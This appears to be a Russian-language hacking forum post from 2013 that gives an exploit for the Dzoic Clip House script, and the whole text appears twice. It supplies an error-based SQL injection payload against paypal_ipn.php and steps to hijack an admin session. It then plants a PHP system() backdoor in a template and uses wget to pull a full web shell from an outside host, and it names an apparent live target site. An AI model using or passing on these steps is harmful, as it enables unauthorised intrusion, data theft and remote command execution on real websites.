MaSTeR GэN
15.01.2013, 11:44
Dzoic Clip House exploit
URL производителя : http://dzoic.com/
DEMO: http://www.cliphousedemo.com/
Error based sql inj
CODE(/psystems/paypal/paypal_ipn.php):
else{
$sql_query="DELETE FROM payment_gateway WHERE order_id=".$paypal->ipn_data['custom'];
$GLOBALS["DB"]->execute($sql_query);
exploit:
http://www.test.com/psystems/paypal/paypal_ipn.php
post:
custom=1and1=(select 1 from(select count(*),con cat(version(),floor(rand(0)*2))x from informatio n_schema.tables group by x)a)
Заливка шелла:
1.Если не подобрался админ пасс дергаем админ сессию куки:
mem_id:100000
password:хеш_пароля из бд
sess_id:ид сессии из базы
2.Лезим в редактирование шаблонов "http://test.com/administrator/index.php?section=composer"
3.Создаем новую страницу и туда пихаем
{php}
system($_POST[cmd]);
{/php}
4.Заливаем нормальный шелл :
http://test.com/index.php
post:
page=page_name&cmd=wget-O./uploader/tmp/swf.php http://url.com/shell.txt
5.Юзаем полноценный шелл по адреcу http://test.com/uploader/tmp/swf.php
TEST LINK:http://vidiload.com/
URL производителя : http://dzoic.com/
DEMO: http://www.cliphousedemo.com/
Error based sql inj
CODE(/psystems/paypal/paypal_ipn.php):
else{
$sql_query="DELETE FROM payment_gateway WHERE order_id=".$paypal->ipn_data['custom'];
$GLOBALS["DB"]->execute($sql_query);
exploit:
http://www.test.com/psystems/paypal/paypal_ipn.php
post:
custom=1and1=(select 1 from(select count(*),con cat(version(),floor(rand(0)*2))x from informatio n_schema.tables group by x)a)
Заливка шелла:
1.Если не подобрался админ пасс дергаем админ сессию куки:
mem_id:100000
password:хеш_пароля из бд
sess_id:ид сессии из базы
2.Лезим в редактирование шаблонов "http://test.com/administrator/index.php?section=composer"
3.Создаем новую страницу и туда пихаем
{php}
system($_POST[cmd]);
{/php}
4.Заливаем нормальный шелл :
http://test.com/index.php
post:
page=page_name&cmd=wget-O./uploader/tmp/swf.php http://url.com/shell.txt
5.Юзаем полноценный шелл по адреcу http://test.com/uploader/tmp/swf.php
TEST LINK:http://vidiload.com/